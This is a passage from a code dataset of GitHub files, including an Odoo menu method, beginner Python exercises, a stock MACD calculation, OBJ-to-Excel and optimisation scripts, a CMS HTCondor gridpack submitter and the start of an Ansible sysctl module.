{menu_item[\"id\"]: menu_item for menu_item in menu_items}\r\n for menu_item in menu_items:\r\n parent = menu_item['parent_id'] and menu_item['parent_id'][0]\r\n if parent in menu_items_map:\r\n menu_items_map[parent].setdefault(\r\n 'children', []).append(menu_item)\r\n\r\n # 使用parent_id按顺序对树进行排序\r\n for menu_item in menu_items:\r\n menu_item.setdefault('children', []).sort(key=operator.itemgetter('sequence'))\r\n\r\n (menu_roots + menus)._set_menuitems_xmlids(menu_root)\r\n\r\n return menu_root","repo_name":"Jacky-odoo/cabalcon14","sub_path":"rainbow_community_theme/models/ir_ui_menu.py","file_name":"ir_ui_menu.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"9901617373","text":"#!/usr/bin/env python3\n\n# Script Name: File Handling\n# Author: Gerald\n# Date of latest revision: 6/12/2023\n# Purpose: Creates a text file, edits line, then deletes \n# Instructions: \n#Using file handling commands \n#create a Python script that creates a new .txt file \n#appends three lines \n#prints to the screen the first line\n#then deletes the .txt file.\n\n\n#Declartion of varibles:\nwords = open(\"Ops10text.txt\", \"w\")\n\n#Declaration of functions:\n#words is the variable name, write is the command of what we're doing in this case writing text\n# The \"\" containts the text and tells python that thats a string, while the \\n is to start a new line\n\n\n\n\n#Main\n# This writes the text in \"\" in the files\nwords.write(\"Example text\\n\")\nwords.write(\"This is a second line of text\\n\")\nwords.write(\"A final line of text\\n\")\n#then you have to close the file since you cant just switch to read\nwords.close()\n#open up the file in read mode the \"r\" denotes read mode\nwords = open(\"Ops10text.txt\", \"r\")\n# I dont know why below doesnt work, not even when I switch it to 1\n#words.readlines(0)\n#Chat GPT saids to make it a variable first and I dont understand why\n#lines = words.readlines()\n\n# Print the first line\nlines = words.readlines()\n#The Code below deletes the fiel\nline1 = lines[0]\nprint(line1)\n\n# Close the file by calling the close() method\nwords.close()\n# Remove the file using the os module\nimport os\nos.remove(\"Ops10text.txt\")\n\n","repo_name":"gerreit/301-Code-Challenge","sub_path":"10 Python file handling.py","file_name":"10 Python file handling.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22949838976","text":"import pandas as pd\nimport futuquant as ft\nimport numpy as np\nimport datetime\nimport time\n\nfrom futuquant.myProFiles import stockData\n\nquote_ctx = ft.OpenQuoteContext(host='127.0.0.1', port=11111)\npre_day = '2017-05-30'\n# 获取数据\n# _, df = pd.read_csv('C:/Users/HXWD/Desktop/000001.csv', encoding='gbk')\n_, df = quote_ctx.get_history_kline(\"HK.00700\", start=pre_day)\nret_data = stockData.getStockInfoRealTime(quote_ctx, stockCode='HK.00700')\n\n_, df = quote_ctx.get_history_kline(\"HK.00700\", start=pre_day)\ndf.columns = ['code', 'time_key', 'open', 'close', 'high', 'low', 'pe_ratio', 'turnover_rate', 'volume', 'turnover',\n 'change_rate']\n# df = df[['date', 'open', 'high', 'low', 'close', 'volume', 'amt']]\ndf = df[['close', 'time_key']]\nret_data = stockData.getStockInfoRealTime(quote_ctx, stockCode='HK.00700')\nret_data = ret_data[['last_price', 'data_date']]\n# ret_data.columns = [['close', 'time_key']]\nret_data = ret_data.rename(columns={'last_price': 'close'})\nret_data = ret_data.rename(columns={'data_date': 'time_key'})\nret_data[[\"time_key\"]] = ret_data[[\"time_key\"]] + \" 00:00:00\"\ndf = pd.concat([df, ret_data], axis=0)\ndf.index = pd.Series(range(len(df)))\n\ndf.head()\n\n\ndef get_EMA(df, N):\n for i in range(len(df)):\n if i == 0:\n df.ix[i, 'ema'] = df.ix[i, 'close']\n if i > 0:\n df.ix[i, 'ema'] = (2 * df.ix[i, 'close'] + (N - 1) * df.ix[i - 1, 'ema']) / (N + 1)\n ema = list(df['ema'])\n return ema\n\n\ndef get_MACD(df, short=12, long=26, M=9):\n a = get_EMA(df, short)\n b = get_EMA(df, long)\n df['dif'] = pd.Series(a) - pd.Series(b)\n for i in range(len(df)):\n if i == 0:\n df.ix[i, 'dea'] = df.ix[i, 'dif']\n if i > 0:\n df.ix[i, 'dea'] = (2 * df.ix[i, 'dif'] + (M - 1) * df.ix[i - 1, 'dea']) / (M + 1)\n df['macd'] = 2 * (df['dif'] - df['dea'])\n df = df.sort_index(ascending=True)\n return df\n\n\nget_MACD(df, 12, 26, 9)\ndf\n","repo_name":"dongxiao999999/futuquant","sub_path":"futuquant/myProFiles/testMacd.py","file_name":"testMacd.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"66"} +{"seq_id":"70042757650","text":"from pickle import FALSE, TRUE\nopcion=int(input(\"Ingrese la opción que desea. \\n (1) Anadir cliente, \\n (2) Eliminar cliente, \\n (3) Mostrar cliente. \\n (4) Listar todos los clientes. \\n (5) Listar clientes preferentes. \\n (6) Terminar.\\n Escriba su opción: \"))\ndatosCliente={}\nif opcion == 1:\n nombre=(str(input(\"Ingrese el nombre del cliente: \")))\n direccion=(str(input(\"Ingrese la dirección del cliente: \")))\n telefono=(str(input(\"Ingrese el teléfono del cliente: \")))\n correo=(str(input(\"Ingrese el correo del cliente: \")))\n Datopreferente=(int(input(\"Si el cliente es preferente digite (1) si no lo es digite (0): \")))\n if Datopreferente == 1:\n preferente=TRUE\n else:\n preferente=FALSE\n datosCliente={\"Nombre\": nombre, \"Dirección\": direccion, \"Teléfono\": telefono, \"Correo\":correo, \"Preferente\": preferente}\n NIF=int(input(\"Ingrese el NIF del cliente: \"))\n datosCliente[NIF]= datosCliente\n print(datosCliente)\n print(preferente)\nelif opcion == 2:\n clienteBorrado=datosCliente.pop(input(\"Ingrese ell NIF del cliente que desea borrar: \"))\nelif opcion ==3:\n consultaCliente=(int(input(\"Ingrese el NIF del cliente que desea ver: \")))\n print(datosCliente[consultaCliente])\nelif opcion ==4:\n print(datosCliente)\nelif opcion == 5:\n print(datosCliente)\nelse:\n print(\"Gracias. Vuelva pronto\")","repo_name":"ChrisBermudezR/Mintic_2022","sub_path":"Codigo/Ciclo_01/Semana_05/Ejercicio.py","file_name":"Ejercicio.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6423646364","text":"import glob #ファイル操作用モジュール\r\nimport numpy as np #数値計算用モジュール\r\nimport pandas as pd #データ処理用モジュール\r\nimport xlwings as xw #Excel操作用モジュール\r\n\r\n\r\n\r\n#フォルダ内のファイル名を取得\r\nobj_names = glob.glob(u'./obj_files/*.obj') #正規表現で検索\r\nprint (\"obj_names =\", obj_names)\r\nprint()\r\n\r\n#xlwingsでExcelファイルを読み込み\r\nexcel_name = \"import_obj.xlsm\"\r\n#wb = xw.Book() #Excel New Bookを作成\r\nwb = xw.Book(excel_name) #既存のファイルを読み込み\r\nsht = wb.sheets[u'一覧表'] #操作するシートのインスタンスを作成\r\ntable_loc = \"C5\" #Excelデータの読み込み位置(左上)\r\n\r\n\r\n\r\n#列ラベル\r\nobj_label01 = ['製品名','部品名','最長長さ','中間長さ','最小長さ']\r\nobj_label02 = ['面積','体積','頂点数','試作単価']\r\n\r\n#データフレームを作成\r\n#obj_df_all = pd.DataFrame(index=[], columns=obj_label01+obj_label02) #空のデータを作成\r\nobj_df_all = sht.range(table_loc).options(pd.DataFrame, expand='table').value #Excelから読み込み\r\nprint(obj_df_all)\r\n\r\n\r\n\r\n#各objファイルのx,y,z長さを計算\r\nfor i in range(len(obj_names)):\r\n obj_name = obj_names[i][12:-4].split(\"_\",1) #不要文字を削除し、最初の_で区切る\r\n print(\"name =\", obj_name)\r\n\r\n #objデータから頂点データを取得\r\n obj_vtx = pd.read_csv(obj_names[i], encoding=\"shift_jis\", skiprows=2, header=None, sep='\\s+')\r\n obj_vtx.columns = ['data', 'x', 'y', 'z'] #列ラベルをつける\r\n obj_vtx = obj_vtx[obj_vtx['data']=='v'] #頂点データのみ取得して置換\r\n obj_vtx = obj_vtx[['x', 'y', 'z']].astype(np.float64) #float64に型変換\r\n #print(obj_vtx.head(5))\r\n\r\n #x,y,z方向の長さ\r\n obj_len = np.empty(3, np.float)\r\n obj_len[0] = max(obj_vtx['x']) -min(obj_vtx['x'])\r\n obj_len[1] = max(obj_vtx['y']) -min(obj_vtx['y'])\r\n obj_len[2] = max(obj_vtx['z']) -min(obj_vtx['z'])\r\n obj_len = np.sort(obj_len)[::-1] #降順(大きい順)にソート\r\n print(\"xl =\",obj_len[0], \", yl =\",obj_len[1], \", zl =\",obj_len[2])\r\n\r\n #最外形の面積・体積\r\n obj_area = obj_len[0]*obj_len[1]\r\n obj_vol = obj_len[0]*obj_len[1]*obj_len[2]\r\n print(\"area = \",obj_area, \", vol =\",obj_vol)\r\n\r\n #頂点数\r\n obj_vtx_total = len(obj_vtx['x'])\r\n print(\"vtx total = \",obj_vtx_total)\r\n\r\n #データフレームに追加\r\n obj_se01 = pd.Series([obj_name[0],obj_name[1], obj_len[0],obj_len[1],obj_len[2]], index=obj_label01)\r\n obj_se02 = pd.Series([obj_area,obj_vol, obj_vtx_total, ''], index=obj_label02)\r\n obj_se_all = pd.concat([obj_se01,obj_se02]) #データを横に結合\r\n obj_df_all = obj_df_all.append(obj_se_all, ignore_index=True) #データを縦に結合\r\n print()\r\n\r\n\r\n#データの体裁を整える\r\nobj_df_all = obj_df_all.drop_duplicates(subset=['製品名','部品名'], keep='first') #重複してたら後ろを消す\r\nobj_df_all = obj_df_all.sort_values(['製品名','部品名'], ascending=[True, True]) #昇順(小さい順)にソート\r\n\r\nprint(obj_df_all)\r\n\r\n\r\n\r\n#pandasでExcelに書き出し\r\n'''excel_writer = pd.ExcelWriter('01_モデルデータ.xlsx') #出力ファイル名を指定\r\nobj_df_all.to_excel(excel_writer, '一覧表', index=False) #シート名を指定してデータフレームを書き出す\r\nexcel_writer.save() #書き出した内容を保存'''\r\n\r\n\r\n#xlwingsでExcelに書き出し\r\nsht.range(table_loc).value = obj_df_all #Excelにデータフレームを書き込み\r\nwb.save(excel_name) #保存'''\r\n","repo_name":"sunsetyuhi/obj_py","sub_path":"import_obj01.py","file_name":"import_obj01.py","file_ext":"py","file_size_in_byte":3568,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"39477648199","text":"# Écrivez un programme qui convertisse en degrés Celsius une température exprimée au départ en degrés Fahrenheit, ou l’inverse.\n# La formule de conversion est : T F =T C ×1,8 + 32\n\n\nt = 10\ntc = 0\ntf = 0\n\ntf = t * 1.8 + 32\ntc = t / 1.8 - 32\n\nprint (\"De Fahrenheit à Celsius = \", tc, \" Degres Celsius\")\nprint (\"De Celsius à Fahrenheit= \", tf, \" Degres Fahrenheit\")","repo_name":"eurbain/Ex_1","sub_path":"ex5.3.py","file_name":"ex5.3.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"38185302193","text":"import re\r\nimport openpyxl\r\nfrom openpyxl import Workbook\r\nfrom openpyxl.styles import PatternFill\r\n\r\nfrom minimize_point import optimize\r\n\r\n\r\nroot_dir = \"..\\\\\"\r\n\r\nres_wb = Workbook()\r\nres_ws = res_wb.create_sheet()\r\nsheet = res_wb.active\r\ntitle = [\"Tag编号\", \"精确x\", \"精确y\", \"精确z\", \"预测精准度\", \"最优解x\", \"最优解y\", \"最优解z\", \"x差值\", \"y差值\", \"z差值\"]\r\nsheet.append(title)\r\n\r\nwb = openpyxl.load_workbook(root_dir+\"根据训练数据得到坐标.xlsx\", data_only=True)\r\nws = wb.active\r\nrows = ws.rows\r\n# 全部数据\r\nli = list(rows)\r\ni=1\r\nerror=0\r\nwith open(root_dir+\"Tag坐标信息.txt\", 'r', encoding='utf-8') as txtData:\r\n lines = txtData.readlines()\r\n for data in lines[2:]:\r\n if len(data) != 1:\r\n loc = re.findall(r\"\\d+\", data)\r\n train_row = li[i]\r\n S = [train_row[1].value, train_row[2].value, train_row[3].value, train_row[4].value]\r\n G = [train_row[5].value, train_row[6].value, train_row[7].value]\r\n anchor = [[0, 0, 1300],\r\n [5000, 0, 1700],\r\n [0, 5000, 1700],\r\n [5000, 5000, 1300]]\r\n # print(S, G)\r\n ans = optimize(anchor, S, G)\r\n # 1 ['1', '50', '50', '88'] True [543.82663116 530.89997737 931.82941295]\r\n # 324 ['324', '450', '450', '200'] False [718.35134475 676.19105009 14.30062475]\r\n # print(i, int(loc[1])*10, int(loc[2])*10, int(loc[3])*10, ans[0], ans[1][0], ans[1][1], ans[1][2],\r\n # abs(ans[1][0]-int(loc[1])*10),\r\n # abs(ans[1][1] - int(loc[2]) * 10),\r\n # abs(ans[1][2] - int(loc[3]) * 10)\r\n # )\r\n if ans[0]:\r\n sheet.append(\r\n [i, int(loc[1]) * 10, int(loc[2]) * 10, int(loc[3]) * 10, ans[0], ans[1][0], ans[1][1], ans[1][2],\r\n abs(ans[1][0] - int(loc[1]) * 10),\r\n abs(ans[1][1] - int(loc[2]) * 10),\r\n abs(ans[1][2] - int(loc[3]) * 10)])\r\n else:\r\n error+=1\r\n red_fill = PatternFill(fill_type='solid', fgColor=\"FF0000\", bgColor=\"AACF91\")\r\n sheet.row_dimensions[i+1].fill = red_fill\r\n sheet.append([i, int(loc[1])*10, int(loc[2])*10, int(loc[3])*10, ans[0], ans[1][0], ans[1][1], ans[1][2],\r\n abs(ans[1][0]-int(loc[1])*10),\r\n abs(ans[1][1] - int(loc[2]) * 10),\r\n abs(ans[1][2] - int(loc[3]) * 10)])\r\n\r\n i += 1\r\nprint(error)\r\n# res_wb.save(\"利用COBYLA算法求得最优解.xlsx\")\r\nres_wb.save(\"利用SLSQP算法求得最优解.xlsx\")\r\n# res_wb.save(\"利用TNC算法求得最优解.xlsx\")\r\n# res_wb.save(\"利用Nelder-Mead算法求得最优解.xlsx\")\r\n\r\n# res_wb.save(\"利用Powell算法求得最优解.xlsx\")\r\n# res_wb.save(\"利用trust-krylov算法求得最优解.xlsx\")","repo_name":"MysticalGuest/HuaweiCUP","sub_path":"Mission2/最优解/minimize_all.py","file_name":"minimize_all.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"43285692898","text":"#! /usr/bin/env python\n# Author: Izaak Neutelings (June 2020)\n# Note:\n# - Clone genproductions (official or private) with gridpack_generation.sh and cards:\n# cd /eos/user/i/ineuteli/prod\n# git clone git@github.com:cms-sw/genproductions.git genproductions\n# git clone git@github.com:IzaakWN/genproductions.git genproductions\n# - Gridpack working areas can get large; O(400MB) per gridpack\n# - AFS has a limited space (up to 10 GB, use `fs listquota`)\n# => use CMSSW working directory on EOS\n# - HTCondor jobs cannot be submitted from EOS\n# => submit from AFS\n# - git push does not work on EOS\nfrom __future__ import print_function # for python3 compatibility\nimport os, sys\nfrom create_cards import createcards, subplaceholders\nfrom utils import ensuredir, subkey, warning\n\n#print sys.path\n#basedir = \"/eos/user/i/ineuteli/production/LQ_Request2020/genproductions/bin/MadGraph5_aMCatNLO\"\n#basedir = \"genproductions/bin/MadGraph5_aMCatNLO\"\narch_dict = {\n '2016': ('slc6_amd64_gcc481','CMSSW_7_1_45_patch3'),\n '2017': ('slc6_amd64_gcc630','CMSSW_9_3_17'),\n '2018': ('slc6_amd64_gcc700','CMSSW_10_2_20'),\n 'UL2016': ('slc7_amd64_gcc700','CMSSW_10_6_31'),\n}\narch_dict['UL2017'] = arch_dict['UL2016']\narch_dict['UL2018'] = arch_dict['UL2016']\n\n\ndef findHTCondorBindings():\n # export PYTHONPATH=/usr/lib64/python2.6/site-packages\n import htcondor\n print(os.path.dirname(htcondor.__file__))\n \n\ndef submit(sample,carddir,scram,cmssw,mock=False):\n #command = \"sbatch -J gridpack_%s submit_gridpack_generation_SLURM.sh %s %s\"%(sample,sample,carddir)\n #command = \"qsub -N gridpack_%s submit_gridpack_generation_SGE.sh %s %s %s %s\"%(sample,sample,carddir,scram,cmssw)\n command = \"./submit_condor_gridpack_generation.sh %s %s %s %s\"%(sample,carddir,scram,cmssw)\n print(command)\n if not mock:\n os.system(command)\n \n\ndef submitArgFile(jobname,argfile,jobdir=\"jobs\",mock=False):\n logdir = ensuredir(os.path.join(jobdir,'log'))\n logfile = os.path.join(logdir,\"%s.$(ClusterId).$(ProcId).log\"%(jobname))\n command = \"condor_submit -batch-name %s -append mylogfile='%s' submit_gridpack_condor.sub -queue arg from %s\"%(jobname,logfile,argfile)\n print(\">>> %s\"%(command))\n if not mock:\n os.system(command)\n \n\ndef createArgFile(jobname,name,masses,scram,cmssw,carddir,jobdir=\"jobs\",workdir=None):\n ensuredir(jobdir)\n jobname = jobname.replace('$MASS','')\n fname = os.path.join(jobdir,\"args_%s.txt\"%(jobname))\n print(\">>> %s\"%(jobname))\n with open(fname,'w+') as file:\n for mass in masses:\n ###for lambd in lambdas:\n ###print \">>> mass=%s, lambda=%s\"%(mass,lambd)\n ###lambd = str(lambd).replace('.','p')\n name_ = subkey(name,MASS=mass) #\"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n carddir_ = subkey(carddir,MASS=mass) #\"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n ###if carddir_[0]!='/':\n ### carddir_ = os.path.abspath(carddir_)\n ###carddir_ = os.path.join(carddir,name_)\n fulldir = os.path.abspath(carddir_) #os.path.join(basedir,carddir)\n workdir_ = os.path.join(workdir,name_)\n if not os.path.exists(fulldir):\n print(warning(\"createArgFile: Sample card directory does not exist! %r\"%(fulldir),pre=\">>> \"))\n if os.path.exists(workdir_): # created by gridpack_generation.sh\n print(warning(\"createArgFile: Work directory already exists! Please remove %r\"%(workdir_),pre=\">>> \"))\n if workdir: # create path relative to gridpack_generation.sh in workdir\n carddir_ = os.path.relpath(carddir_,workdir)\n if workdir and workdir[0]=='/' and fulldir[0]=='/' and workdir.split('/')[:2]!=fulldir.split('/')[:2]:\n print(warning(\"createArgFile: carddir and workdir are not on the same system? carddir=%s vs. workdir=%s\"%(fulldir,workdir),pre=\">>> \"))\n args = \"%s %s %s %s\"%(name_,carddir_,scram,cmssw)\n print(\">>> %s\"%(args))\n file.write(args+'\\n')\n return fname\n \n\ndef main(args):\n #findHTCondorBindings()\n \n create = args.create\n mock = args.mock\n #carddirs = [\"cards/production/2017/13TeV/ScalarLQ/\"]\n carddirs = args.carddirs\n cardname = args.cardname or \"$NAME_M$MASS_L$LAMBDA\"\n jobname = \"$NAME_L$LAMBDA_$ERA\" # no mass\n eras = args.eras\n ###models = args.models #['VectorLQ','ScalarLQ']\n ###procs = args.procs #['Single',] #'Pair']\n #masses = [600,800,1000,1200,1400,1700,2000] #500,800,1100,1400,1700,2000,2300]\n masses = args.masses or [600,1400,2000]\n lambdas = args.lambdas or [1.0]\n jobdir = args.jobdir #\"jobs/\"\n basedir = args.workdir or \"/afs/cern.ch/user/i/ineuteli/prod/CRAB/CMSSW_10_6_19/src\"\n #basedir = args.workdir or \"/eos/user/i/ineuteli/prod\" #CMSSW_10_6_19/src\"\n workdir = os.path.join(basedir,\"genproductions/bin/MadGraph5_aMCatNLO\")\n if basedir.startswith('/eos/'): # on EOS: ensure cards relative to workdir\n outdir = os.path.join(basedir,'cards/$CARDNAME')\n else: # on AFS\n outdir = os.path.join(jobdir,'cards/$CARDNAME')\n verbosity = args.verbosity+2\n #lambdas = [1.5,2.0,2.5]\n #jobname = \"%sScalarLQToBTau_L%s_%s\"%(proc,lambd,era)\n #sample = \"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n #jobname = \"$PROC$SPIN$MODEL_L$LAMBDA_$MASS_$ERA\"\n #os.chdir(basedir)\n assert os.path.exists(workdir), \"Working directory %s does not exist!\"%(workdir)\n \n for carddir in carddirs:\n if create: # create datacards locally\n print(\">>> Create data cards...\")\n paramdict = { 'LAMBDA': lambdas }\n names = createcards(carddir,cardname,masses,paramdict,outdir=outdir,verb=verbosity)\n name_ = names[0]\n else: # use datacards in CMSSW\n name_ = os.basename(carddir.rstrip('/'))\n ###basedir = \"$CMSSW_BASE/genproductions/bin/MadGraph5_aMCatNLO\"\n ###fulldir = os.path.join(basedir,carddir)\n ###if not os.path.exists(fulldir):\n ### print(\">>> Card directory does not exist! %r\"%(fulldir))\n for era in eras:\n scram, cmssw = arch_dict[era]\n ###for model in models:\n ### for proc in procs:\n \n # PRINT\n if verbosity>=1:\n print(\">>> \"+'='*90)\n print(\">>> name = %r\"%name_)\n print(\">>> cardname = %r\"%cardname)\n print(\">>> jobname = %r\"%jobname)\n print(\">>> carddir = %s\"%carddir)\n print(\">>> workdir = %s\"%workdir)\n print(\">>> outdir = %s\"%outdir)\n print(\">>> masses = %s\"%masses)\n print(\">>> lambdas = %s\"%lambdas)\n print(\">>> era = %s\"%era)\n print(\">>> scram = %s\"%scram)\n print(\">>> cmssw = %s\"%cmssw)\n print(\">>> \"+'='*90)\n \n for lambd in lambdas:\n lambd = str(lambd).replace('.','p')\n jobname_ = subplaceholders(jobname,NAME=name_,LAMBDA=lambd,ERA=era) #,MODEL=model,PROC=proc\n cardname_ = subkey(cardname,NAME=name_,LAMBDA=lambd,ERA=era) # ignore $MASS\n carddir_ = subkey(outdir,CARDNAME=cardname_,NAME=name_,LAMBDA=lambd,ERA=era)\n if verbosity>=2:\n #print(\">>> carddir=%r, era=%r, lambda=%r, name=%r, scram=%r, cmssw=%r\"%(carddir,era,lambd,name,scram,cmssw))\n print(\">>> lambda=%r, name=%r, jobname=%r, cardname=%r -> %r\"%(lambd,name_,jobname_,cardname,cardname_))\n argfile = createArgFile(jobname_,cardname_,masses,scram,cmssw,carddir_,jobdir=jobdir,workdir=workdir)\n submitArgFile(jobname_,argfile,jobdir=jobdir,mock=mock)\n print()\n #for mass in masses:\n # for lambd in lambdas:\n # print(\">>> mass=%s, lambda=%s\"%(mass,lambd))\n # lambd = str(lambd).replace('.','p')\n # sample = \"%sScalarLQToBTau_M%s_L%s\"%(proc,mass,lambd)\n # samdir = os.path.join(carddir,sample)\n # fulldir = os.path.join(basedir,samdir)\n # if not os.path.exists(fulldir):\n # print(\">>> Sample card directory does not exist! %r\"%(fulldir))\n # submit(sample,samdir,scram,cmssw)\n # print()\n \n\nif __name__=='__main__':\n print()\n from argparse import ArgumentParser\n description = '''Create gridpack with condor jobs.'''\n parser = ArgumentParser(prog=\"submit_gridpack_condor\",description=description,epilog=\"Good luck!\")\n parser.add_argument('carddirs', type=str, nargs='+', action='store',\n metavar='CARDDIRS', help=\"directoy with cards\" )\n parser.add_argument('-c', '--create', dest='create', action='store_true',\n help=\"create cards before submitting\" )\n parser.add_argument('-m', '--mock', action='store_true',\n help=\"mock submit (for debugging)\" )\n ###parser.add_argument( '--model', dest='models', nargs='+', choices=['VectorLQ','ScalarLQ'],\n ### help=\"models\" )\n ###parser.add_argument('-p', '--proc', dest='procs', nargs='+', choices=['Pair','Single','NonRes'],\n ### help=\"processes\" )\n parser.add_argument('-n', '--cardname', type=str, action='store', default=None,\n help=\"card name (placeholders allowed)\" )\n parser.add_argument('-M', '--mass', dest='masses', nargs='+', type=int,\n help=\"select masses\" )\n parser.add_argument('-L', '--lambda', dest='lambdas', nargs='+', default=[1.0], type=float,\n help=\"select lambdas\" )\n parser.add_argument('-y', '--era', dest='eras', nargs='+', default=['UL2017'], #choices=[2016,2017,2018], \n help=\"select year/era\" )\n ###parser.add_argument('-o', '--outdir', default='jobdir/cards',\n ### help=\"output directory for cards\" )\n parser.add_argument('-j', '--jobdir', default='jobs',\n help=\"output directory for cards\" )\n parser.add_argument('-w', '--workdir', help=\"parent directory of genproductions\" )\n parser.add_argument('-v', \"--verbose\", dest='verbosity', type=int, nargs='?', const=2, default=1,\n help=\"set level of verbosity, default=%(default)s\" )\n args = parser.parse_args()\n main(args)\n print(\">>> Done.\")\n print()\n \n","repo_name":"IzaakWN/CRAB","sub_path":"submit_gridpack_condor.py","file_name":"submit_gridpack_condor.py","file_ext":"py","file_size_in_byte":10229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"31221656152","text":"#!/usr/bin/python\n# -*- coding: utf-8 -*-\n\n# (c) 2012, David \"DaviXX\" CHANIAL \n# (c) 2014, James Tanner \n# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)\n\nfrom __future__ import absolute_import, division, print_function\n__metaclass__ = type\n\n\nDOCUMENTATION = r'''\n---\nmodule: sysctl\nshort_description: Manage entries in sysctl.conf.\ndescription:\n - This module manipulates sysctl entries and optionally performs a C(/sbin/sysctl -p) after changing them.\nversion_added: \"1.0.0\"\noptions:\n name:\n description:\n - The dot-separated path (also known as I(key)) specifying the sysctl variable.\n required: true\n aliases: [ 'key' ]\n type: str\n value:\n description:\n - Desired value of the sysctl key.\n aliases: [ 'val' ]\n type: str\n state:\n description:\n - Whether the entry should be present or absent in the sysctl file.\n choices: [ \"present\", \"absent\" ]\n default: present\n type: str\n ignoreerrors:\n description:\n - Use this option to ignore errors about unknown keys.\n type: bool\n default: 'no'\n reload:\n description:\n - If C(yes), performs a I(/sbin/sysctl -p) if the C(sysctl_file) is\n updated. If C(no), does not reload I(sysctl) even if the\n C(sysctl_file) is updated.\n type: bool\n default: 'yes'\n sysctl_file:\n description:\n - Specifies the absolute path to C(sysctl.conf), if not C(/etc/sysctl.conf).\n default: /etc/sysctl.conf\n type: path\n sysctl_set:\n description:\n - Verify token value with the sysctl command and set with -w if necessary\n type: bool\n default: 'no'\nauthor:\n- David CHANIAL (@davixx)\n'''\n\nEXAMPLES = r'''\n# Set vm.swappiness to 5 in /etc/sysctl.conf\n- ansible.posix.sysctl:\n name: vm.swappiness\n value: '5'\n state: present\n\n# Remove kernel.panic entry from /etc/sysctl.conf\n- ansible.posix.sysctl:\n name: kernel.panic\n state: absent\n sysctl_file: /etc/sysctl.conf\n\n# Set kernel.panic to 3 in /tmp/test_sysctl.conf\n- ansible.posix.sysctl:\n name: kernel.panic\n value: '3'\n sysctl_file: /tmp/test_sysctl.conf\n reload: no\n\n# Set ip forwarding on in /proc and verify token value with the sysctl command\n- ansible.posix.sysctl:\n name: net.ipv4.ip_forward\n value: '1'\n sysctl_set: yes\n\n# Set ip forwarding on in /proc and in the sysctl file and reload if necessary\n- ansible.posix.sysctl:\n name: net.ipv4.ip_forward\n value: '1'\n sysctl_set: yes\n state: present\n reload: yes\n'''\n\n# ==============================================================\n\nimport os\nimport platform\nimport re\nimport tempfile\n\nfrom ansible.module_utils.basic import AnsibleModule\nfrom ansible.module_utils.six import string_types\nfrom ansible.module_utils.parsing.convert_bool import BOOLEANS_FALSE, BOOLEANS_TRUE\nfrom ansible.module_utils._text import to_native\n\n\nclass SysctlModule(object):\n\n # We have to use LANG=C because we are capturing STDERR of sysctl to detect\n # success or failure.\n LANG_ENV = {'LANG': 'C', 'LC_ALL': 'C', 'LC_MESSAGES': 'C'}\n\n def __init__(self, module):\n self.module = module\n self.args = self.module.params\n\n self.sysctl_cmd = self.module.get_bin_path('sysctl', required=True)\n self.sysctl_file = self.args['sysctl_file']\n\n self.proc_value = None # current token value in proc fs\n self.file_value = None # current token value in file\n self.file_lines = [] # all lines in the file\n self.file_values = {} # dict of token values\n\n self.changed = False # will change occur\n self.set_proc = False # does sysctl need to set value\n self.write_file = False # does the sysctl file need to be reloaded\n\n self.process()\n\n # ==============================================================\n # LOGIC\n # ==============================================================\n\n def process(self):\n\n self.platform = platform.system().lower()\n\n # Whitespace is bad\n self.args['name'] = self.args['name'].strip()\n self.args['value'] = self._parse_value(self.args['value'])\n\n thisname = self.args['name']\n\n # get the current proc fs value\n self.proc_value = self.get_token_curr_value(thisname)\n\n # get the current sysctl file value\n self.read_sysctl_file()\n if thisname not in self.file_values:\n self.file_values[thisname] = None\n\n # update file contents with desired token/value\n self.fix_lines()\n\n # what do we need to do now?\n if self.file_values[thisname] is None and self.args['state'] == \"present\":\n self.changed = True\n self.write_file = True\n elif self.file_values[thisname] is None and self.args['state'] == \"absent\":\n self.changed = False\n elif self.file_values[thisname] and self.args['state'] == \"absent\":\n self.changed = True\n self.write_file = True\n elif self.file_values[thisname] != self.args['value']:\n self.changed = True\n self.write_file = True\n # with reload=yes we should check if the current system values are\n # correct, so that we know if we should reload\n elif self.args['reload']:\n if self.proc_value is None:\n self.changed = True\n elif not self._values_is_equal(self.proc_value, self.args['value']):\n self.changed = True\n\n # use the sysctl command or not?\n if self.args['sysctl_set'] and self.args['state'] == \"present\":\n if self.proc_value is None:\n self.changed = True\n elif not self._values_is_equal(self.proc_value, self.args['value']):\n self.changed = True\n self.set_proc = True\n\n # Do the work\n if not self.module.check_mode:\n if self.set_proc:\n self.set_token_value(self.args['name'], self.args['value'])\n if self.write_file:\n self.write_sysctl()\n if self.changed and self.args['reload']:\n self.reload_sysctl()\n\n def _values_is_equal(self, a, b):\n \"\"\"Expects two string values. It will split the string by whitespace\n and compare each value. It will return True if both lists are the same,\n contain the same elements and the same order.\"\"\"\n if a is None or b is None:\n return False\n\n a = a.split()\n b = b.split()\n\n if len(a) != len(b):\n return False\n\n return len([i for i, j in zip(a, b) if i == j]) == len(a)\n\n def _parse_value(self, value):\n if value is None:\n return ''\n elif isinstance(value, bool):\n if value:\n return '1'\n else:\n return '0'\n elif isinstance(value, string_types):\n if value.lower() in BOOLEANS_TRUE:\n return '1'\n elif value.lower() in BOOLEANS_FALSE:\n return '0'\n else:\n return value.strip()\n else:\n return value\n\n def _stderr_failed(self, err):\n # sysctl can fail to set a value even if it returns an exit status 0\n # 